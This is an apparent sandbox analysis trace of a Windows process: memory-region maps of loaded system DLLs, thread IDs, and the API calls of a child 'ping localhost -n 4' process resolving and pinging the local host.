	        filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")

Region:
	              id = 4393
	        start_va = 0x7ffc15480000
	          end_va = 0x7ffc154dafff
	     entry_point = 0x7ffc15480000
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")

Region:
	              id = 4412
	        start_va = 0x8a094c0000
	          end_va = 0x8a094fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008a094c0000"
	        filename = ""

Region:
	              id = 4413
	        start_va = 0x25a00000000
	          end_va = 0x25a013fffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000025a00000000"
	        filename = ""

Region:
	              id = 4414
	        start_va = 0x25a7f0e0000
	          end_va = 0x25a7f0e0fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000025a7f0e0000"
	        filename = ""

Region:
	              id = 4415
	        start_va = 0x25a7f0f0000
	          end_va = 0x25a7f0f0fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000025a7f0f0000"
	        filename = ""

Region:
	              id = 4416
	        start_va = 0x25a7f2e0000
	          end_va = 0x25a7f467fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000025a7f2e0000"
	        filename = ""

Region:
	              id = 4417
	        start_va = 0x25a7f470000
	          end_va = 0x25a7f5f0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000025a7f470000"
	        filename = ""

Region:
	              id = 4418
	        start_va = 0x25a7f790000
	          end_va = 0x25a7f79ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000025a7f790000"
	        filename = ""

Region:
	              id = 4419
	        start_va = 0x7ffc11c60000
	          end_va = 0x7ffc11caafff
	     entry_point = 0x7ffc11c60000
	     region_type = mapped_file
	            name = "powrprof.dll"
	        filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")

Region:
	              id = 4420
	        start_va = 0x7ffc11cb0000
	          end_va = 0x7ffc11cc3fff
	     entry_point = 0x7ffc11cb0000
	     region_type = mapped_file
	            name = "profapi.dll"
	        filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")

Region:
	              id = 4421
	        start_va = 0x7ffc11cd0000
	          end_va = 0x7ffc11cdefff
	     entry_point = 0x7ffc11cd0000
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")

Region:
	              id = 4422
	        start_va = 0x7ffc11f60000
	          end_va = 0x7ffc125a3fff
	     entry_point = 0x7ffc11f60000
	     region_type = mapped_file
	            name = "windows.storage.dll"
	        filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")

Region:
	              id = 4423
	        start_va = 0x7ffc125b0000
	          end_va = 0x7ffc12664fff
	     entry_point = 0x7ffc125b0000
	     region_type = mapped_file
	            name = "shcore.dll"
	        filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")

Region:
	              id = 4424
	        start_va = 0x7ffc126e0000
	          end_va = 0x7ffc12722fff
	     entry_point = 0x7ffc126e0000
	     region_type = mapped_file
	            name = "cfgmgr32.dll"
	        filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")

Region:
	              id = 4425
	        start_va = 0x7ffc12c40000
	          end_va = 0x7ffc1419efff
	     entry_point = 0x7ffc12c40000
	     region_type = mapped_file
	            name = "shell32.dll"
	        filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")

Region:
	              id = 4426
	        start_va = 0x7ffc14860000
	          end_va = 0x7ffc148b1fff
	     entry_point = 0x7ffc14860000
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")

Region:
	              id = 4427
	        start_va = 0x7ffc154e0000
	          end_va = 0x7ffc15586fff
	     entry_point = 0x7ffc154e0000
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")

Region:
	              id = 4428
	        start_va = 0x7ffc10810000
	          end_va = 0x7ffc108a5fff
	     entry_point = 0x7ffc10810000
	     region_type = mapped_file
	            name = "uxtheme.dll"
	        filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")

Region:
	              id = 4429
	        start_va = 0x8a09500000
	          end_va = 0x8a0953ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000008a09500000"
	        filename = ""

Region:
	              id = 4430
	        start_va = 0x25a01400000
	          end_va = 0x25a01611fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000025a01400000"
	        filename = ""

Region:
	              id = 4431
	        start_va = 0x25a01620000
	          end_va = 0x25a0183bfff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000025a01620000"
	        filename = ""

Region:
	              id = 4432
	        start_va = 0x25a7f100000
	          end_va = 0x25a7f101fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000025a7f100000"
	        filename = ""

Region:
	              id = 4433
	        start_va = 0x25a7f110000
	          end_va = 0x25a7f110fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000025a7f110000"
	        filename = ""

Region:
	              id = 4434
	        start_va = 0x25a7f600000
	          end_va = 0x25a7f70dfff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000025a7f600000"
	        filename = ""

Region:
	              id = 4435
	        start_va = 0x25a7f7a0000
	          end_va = 0x25a7f8aefff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000025a7f7a0000"
	        filename = ""

Region:
	              id = 4436
	        start_va = 0x25a7f990000
	          end_va = 0x25a7f99ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000025a7f990000"
	        filename = ""

Region:
	              id = 4437
	        start_va = 0x25a7f9a0000
	          end_va = 0x25a7fcd6fff
	     entry_point = 0x25a7f9a0000
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")

Region:
	              id = 4438
	        start_va = 0x25a7fce0000
	          end_va = 0x25a7fefafff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000025a7fce0000"
	        filename = ""

Region:
	              id = 4439
	        start_va = 0x7ffc12ae0000
	          end_va = 0x7ffc12c39fff
	     entry_point = 0x7ffc12ae0000
	     region_type = mapped_file
	            name = "msctf.dll"
	        filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")

Region:
	              id = 4440
	        start_va = 0x25a7f710000
	          end_va = 0x25a7f713fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000025a7f710000"
	        filename = ""

Region:
	              id = 4441
	        start_va = 0x25a7f8b0000
	          end_va = 0x25a7f96bfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000025a7f8b0000"
	        filename = ""

Region:
	              id = 4442
	        start_va = 0x7ffc0fcd0000
	          end_va = 0x7ffc0fcf1fff
	     entry_point = 0x7ffc0fcd0000
	     region_type = mapped_file
	            name = "dwmapi.dll"
	        filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")

Region:
	              id = 4443
	        start_va = 0x7ffc103c0000
	          end_va = 0x7ffc103d2fff
	     entry_point = 0x7ffc103c0000
	     region_type = mapped_file
	            name = "wtsapi32.dll"
	        filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")

Region:
	              id = 4444
	        start_va = 0x7ffc11a60000
	          end_va = 0x7ffc11ab5fff
	     entry_point = 0x7ffc11a60000
	     region_type = mapped_file
	            name = "winsta.dll"
	        filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")

Region:
	              id = 4446
	        start_va = 0x25a7f720000
	          end_va = 0x25a7f726fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000025a7f720000"
	        filename = ""

Region:
	              id = 4447
	        start_va = 0x25a7f730000
	          end_va = 0x25a7f730fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000025a7f730000"
	        filename = ""

Region:
	              id = 4448
	        start_va = 0x25a7f740000
	          end_va = 0x25a7f740fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000025a7f740000"
	        filename = ""

Region:
	              id = 4449
	        start_va = 0x25a7f750000
	          end_va = 0x25a7f750fff
	     entry_point = 0x25a7f750000
	     region_type = mapped_file
	            name = "conhostv2.dll.mui"
	        filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui")

Region:
	              id = 4450
	        start_va = 0x25a7f760000
	          end_va = 0x25a7f761fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000025a7f760000"
	        filename = ""

Region:
	              id = 4451
	        start_va = 0x25a7ff00000
	          end_va = 0x25a7ff8bfff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000025a7ff00000"
	        filename = ""

Region:
	              id = 4452
	        start_va = 0x7ffc08b50000
	          end_va = 0x7ffc08dc3fff
	     entry_point = 0x7ffc08b50000
	     region_type = mapped_file
	            name = "comctl32.dll"
	        filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll")


Thread:
	id = 136
	os_tid = 0xf3c


Thread:
	id = 137
	os_tid = 0xed8


Thread:
	id = 138
	os_tid = 0xcc4


Thread:
	id = 139
	os_tid = 0xeb4


Process:
	id = "14"
	image_name = "ping.exe"
	filename = "c:\\windows\\syswow64\\ping.exe"
	page_root = "0x1b491000"
	os_pid = "0xdb0"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "11"
	os_parent_pid = "0x30c"
	cmd_line = "ping  localhost -n 4 "
	cur_dir = "C:\\Users\\Nd9E1FYi\\Desktop\\"
	os_username = "X2VS1CUM\\Nd9E1FYi"
	os_groups = "X2VS1CUM\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f009" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 4476
	        start_va = 0x10000
	          end_va = 0x2ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000010000"
	        filename = ""

Region:
	              id = 4477
	        start_va = 0x30000
	          end_va = 0x44fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000030000"
	        filename = ""

Region:
	              id = 4478
	        start_va = 0x50000
	          end_va = 0x8ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000050000"
	        filename = ""

Region:
	              id = 4479
	        start_va = 0x90000
	          end_va = 0xcffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000090000"
	        filename = ""

Region:
	              id = 4480
	        start_va = 0xd0000
	          end_va = 0xd3fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000000d0000"
	        filename = ""

Region:
	              id = 4481
	        start_va = 0xe0000
	          end_va = 0xe0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000000e0000"
	        filename = ""

Region:
	              id = 4482
	        start_va = 0x200000
	          end_va = 0x3fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000200000"
	        filename = ""

Region:
	              id = 4483
	        start_va = 0xde0000
	          end_va = 0xde1fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000de0000"
	        filename = ""

Region:
	              id = 4484
	        start_va = 0x1110000
	          end_va = 0x1118fff
	     entry_point = 0x1110000
	     region_type = mapped_file
	            name = "ping.exe"
	        filename = "\\Windows\\SysWOW64\\PING.EXE" (normalized: "c:\\windows\\syswow64\\ping.exe")

Region:
	              id = 4485
	        start_va = 0x1120000
	          end_va = 0x511ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000001120000"
	        filename = ""

Region:
	              id = 4486
	        start_va = 0x77960000
	          end_va = 0x77adafff
	     entry_point = 0x77960000
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")

Region:
	              id = 4487
	        start_va = 0x7f1a0000
	          end_va = 0x7f1c2fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007f1a0000"
	        filename = ""

Region:
	              id = 4488
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 4489
	        start_va = 0x7fff0000
	          end_va = 0x7dfc1562ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007fff0000"
	        filename = ""

Region:
	              id = 4490
	        start_va = 0x7dfc15630000
	          end_va = 0x7ffc1562ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007dfc15630000"
	        filename = ""

Region:
	              id = 4491
	        start_va = 0x7ffc15630000
	          end_va = 0x7ffc157f0fff
	     entry_point = 0x7ffc15630000
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 4492
	        start_va = 0x7ffc157f1000
	          end_va = 0x7ffffffeffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffc157f1000"
	        filename = ""

Region:
	              id = 4493
	        start_va = 0xf0000
	          end_va = 0xf1fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000000f0000"
	        filename = ""

Region:
	              id = 4494
	        start_va = 0x500000
	          end_va = 0x50ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000500000"
	        filename = ""

Region:
	              id = 4495
	        start_va = 0x55c00000
	          end_va = 0x55c79fff
	     entry_point = 0x55c00000
	     region_type = mapped_file
	            name = "wow64win.dll"
	        filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")

Region:
	              id = 4496
	        start_va = 0x55c90000
	          end_va = 0x55cdffff
	     entry_point = 0x55c90000
	     region_type = mapped_file
	            name = "wow64.dll"
	        filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")

Region:
	              id = 4497
	        start_va = 0x55c80000
	          end_va = 0x55c87fff
	     entry_point = 0x55c80000
	     region_type = mapped_file
	            name = "wow64cpu.dll"
	        filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")

Region:
	              id = 4501
	        start_va = 0x10000
	          end_va = 0x1ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000010000"
	        filename = ""

Region:
	              id = 4502
	        start_va = 0x100000
	          end_va = 0x1bdfff
	     entry_point = 0x100000
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 4503
	        start_va = 0x1c0000
	          end_va = 0x1fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 4504
	        start_va = 0x400000
	          end_va = 0x43ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000400000"
	        filename = ""

Region:
	              id = 4505
	        start_va = 0xde0000
	          end_va = 0xde3fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000de0000"
	        filename = ""

Region:
	              id = 4506
	        start_va = 0xea0000
	          end_va = 0xeaffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000ea0000"
	        filename = ""

Region:
	              id = 4507
	        start_va = 0xf60000
	          end_va = 0x105ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000f60000"
	        filename = ""

Region:
	              id = 4508
	        start_va = 0x71d30000
	          end_va = 0x71d5efff
	     entry_point = 0x71d30000
	     region_type = mapped_file
	            name = "iphlpapi.dll"
	        filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll")

Region:
	              id = 4509
	        start_va = 0x74680000
	          end_va = 0x74689fff
	     entry_point = 0x74680000
	     region_type = mapped_file
	            name = "cryptbase.dll"
	        filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")

Region:
	              id = 4510
	        start_va = 0x74690000
	          end_va = 0x746adfff
	     entry_point = 0x74690000
	     region_type = mapped_file
	            name = "sspicli.dll"
	        filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")

Region:
	              id = 4511
	        start_va = 0x746c0000
	          end_va = 0x7471efff
	     entry_point = 0x746c0000
	     region_type = mapped_file
	            name = "ws2_32.dll"
	        filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll")

Region:
	              id = 4512
	        start_va = 0x74720000
	          end_va = 0x74763fff
	     entry_point = 0x74720000
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")

Region:
	              id = 4513
	        start_va = 0x747c0000
	          end_va = 0x7487dfff
	     entry_point = 0x747c0000
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")

Region:
	              id = 4514
	        start_va = 0x75070000
	          end_va = 0x7511cfff
	     entry_point = 0x75070000
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")

Region:
	              id = 4515
	        start_va = 0x765a0000
	          end_va = 0x7667ffff
	     entry_point = 0x765a0000
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 4516
	        start_va = 0x773a0000
	          end_va = 0x773f7fff
	     entry_point = 0x773a0000
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")

Region:
	              id = 4517
	        start_va = 0x774c0000
	          end_va = 0x7763dfff
	     entry_point = 0x774c0000
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")

Region:
	              id = 4518
	        start_va = 0x7f0a0000
	          end_va = 0x7f19ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007f0a0000"
	        filename = ""

Region:
	              id = 4519
	        start_va = 0x71ea0000
	          end_va = 0x71eeefff
	     entry_point = 0x71ea0000
	     region_type = mapped_file
	            name = "mswsock.dll"
	        filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll")

Region:
	              id = 4520
	        start_va = 0x71d60000
	          end_va = 0x71de3fff
	     entry_point = 0x71d60000
	     region_type = mapped_file
	            name = "dnsapi.dll"
	        filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll")

Region:
	              id = 4521
	        start_va = 0x774b0000
	          end_va = 0x774b6fff
	     entry_point = 0x774b0000
	     region_type = mapped_file
	            name = "nsi.dll"
	        filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll")

Region:
	              id = 4522
	        start_va = 0x5120000
	          end_va = 0x5456fff
	     entry_point = 0x5120000
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")

Region:
	              id = 4523
	        start_va = 0x71d20000
	          end_va = 0x71d27fff
	     entry_point = 0x71d20000
	     region_type = mapped_file
	            name = "rasadhlp.dll"
	        filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll")

Region:
	              id = 4524
	        start_va = 0x71cd0000
	          end_va = 0x71d16fff
	     entry_point = 0x71cd0000
	     region_type = mapped_file
	            name = "fwpuclnt.dll"
	        filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll")

Region:
	              id = 4525
	        start_va = 0x74330000
	          end_va = 0x7434afff
	     entry_point = 0x74330000
	     region_type = mapped_file
	            name = "bcrypt.dll"
	        filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll")

Region:
	              id = 4526
	        start_va = 0x70200000
	          end_va = 0x70207fff
	     entry_point = 0x70200000
	     region_type = mapped_file
	            name = "winnsi.dll"
	        filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll")

Region:
	              id = 4527
	        start_va = 0x440000
	          end_va = 0x47ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000440000"
	        filename = ""

Region:
	              id = 4528
	        start_va = 0x480000
	          end_va = 0x4bffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000480000"
	        filename = ""

Region:
	              id = 4529
	        start_va = 0x20000
	          end_va = 0x21fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000020000"
	        filename = ""

Region:
	              id = 4530
	        start_va = 0x4c0000
	          end_va = 0x4c0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000004c0000"
	        filename = ""

Region:
	              id = 4531
	        start_va = 0xdf0000
	          end_va = 0xdf2fff
	     entry_point = 0xdf0000
	     region_type = mapped_file
	            name = "ping.exe.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\ping.exe.mui")


Thread:
	id = 141
	os_tid = 0xd5c

	[0121.409] GetModuleHandleA (lpModuleName=0x0) returned 0x1110000
	[0121.409] __set_app_type (_Type=0x1) 
	[0121.409] __p__fmode () returned 0x74874d6c
	[0121.409] __p__commode () returned 0x74875b1c
	[0121.410] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1113580) returned 0x0
	[0121.410] __wgetmainargs (in: _Argc=0x11140c8, _Argv=0x11140cc, _Env=0x11140d0, _DoWildCard=0, _StartInfo=0x11140dc | out: _Argc=0x11140c8, _Argv=0x11140cc, _Env=0x11140d0) returned 0
	[0121.410] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0121.527] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0121.527] __iob_func () returned 0x74871208
	[0121.527] _fileno (_File=0x74871228) returned 1
	[0121.527] _get_osfhandle (_FileHandle=1) returned 0x3c
	[0121.527] GetFileType (hFile=0x3c) returned 0x2
	[0121.527] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xceda4 | out: lpMode=0xceda4) returned 1
	[0121.625] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x1115500 | out: lpWSAData=0x1115500) returned 0
	[0121.631] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0xcedbc | out: phkResult=0xcedbc*=0xc0) returned 0x0
	[0121.631] RegQueryValueExW (in: hKey=0xc0, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0xcedb0, lpData=0xcedb8, lpcbData=0xcedb4*=0x4 | out: lpType=0xcedb0*=0x0, lpData=0xcedb8*=0x0, lpcbData=0xcedb4*=0x4) returned 0x2
	[0121.631] RegCloseKey (hKey=0xc0) returned 0x0
	[0121.631] GetAddrInfoW (in: pNodeName="localhost", pServiceName=0x0, pHints=0xced80*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xceda4 | out: ppResult=0xceda4*=0x0) returned 11001
	[0121.632] GetAddrInfoW (in: pNodeName="localhost", pServiceName=0x0, pHints=0xced80*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xceda4 | out: ppResult=0xceda4*=0xf6ce20*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname="x2vS1cum", ai_addr=0xf6cf10*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), ai_next=0xf6d028*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xf6ff38*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0))) returned 0
	[0121.674] FreeAddrInfoW (pAddrInfo=0xf6ce20*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname="x2vS1cum", ai_addr=0xf6cf10*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), ai_next=0xf6d028*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xf6ff38*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0))) 
	[0121.674] Icmp6CreateFile () returned 0xf70818
	[0121.857] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0xf6cda8
	[0121.857] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0xf79d90
	[0121.858] GetNameInfoW (in: pSockaddr=0x1115480*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0xceeb0, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0
	[0121.858] __iob_func () returned 0x74871208
	[0121.858] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2720, dwLanguageId=0x0, lpBuffer=0xcedac, nSize=0x0, Arguments=0xceda8 | out: lpBuffer="\xc298\xf7\xf77c\x0c\x27c5\x111\x1228\x7487\x2720") returned 0x19
	[0121.965] fflush (in: _File=0x74871228 | out: _File=0x74871228) returned 0
	[0121.965] _fileno (_File=0x74871228) returned 1
	[0121.965] _get_osfhandle (_FileHandle=1) returned 0x3c
	[0121.965] GetFileType (hFile=0x3c) returned 0x2
	[0121.965] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xced78 | out: lpMode=0xced78) returned 1
	[0124.142] _fileno (_File=0x74871228) returned 1
	[0124.142] _setmode (_FileHandle=1, _Mode=131072) returned 16384
	[0124.142] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xcecd8, nSize=0x50 | out: lpBuffer="\xed64\x0c\x4910\x7757") returned 0x0
	[0124.142] fwprintf (in: _Stream=0x74871228, _Format="%ls" | out: _Stream=0x74871228) returned 25
	[0125.409] fflush (in: _File=0x74871228 | out: _File=0x74871228) returned 0
	[0125.409] _fileno (_File=0x74871228) returned 1
	[0125.409] _setmode (_FileHandle=1, _Mode=16384) returned 65536
	[0125.409] LocalFree (hMem=0xf7c298) returned 0x0
	[0125.409] __iob_func () returned 0x74871208
	[0125.409] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0xcedb0, nSize=0x0, Arguments=0xcedac | out: lpBuffer="\xc298\xf7\xf77c\x0c\x2874\x111\x1228\x7487\x275a") returned 0x18
	[0125.410] fflush (in: _File=0x74871228 | out: _File=0x74871228) returned 0
	[0125.410] _fileno (_File=0x74871228) returned 1
	[0125.410] _get_osfhandle (_FileHandle=1) returned 0x3c
	[0125.410] GetFileType (hFile=0x3c) returned 0x2
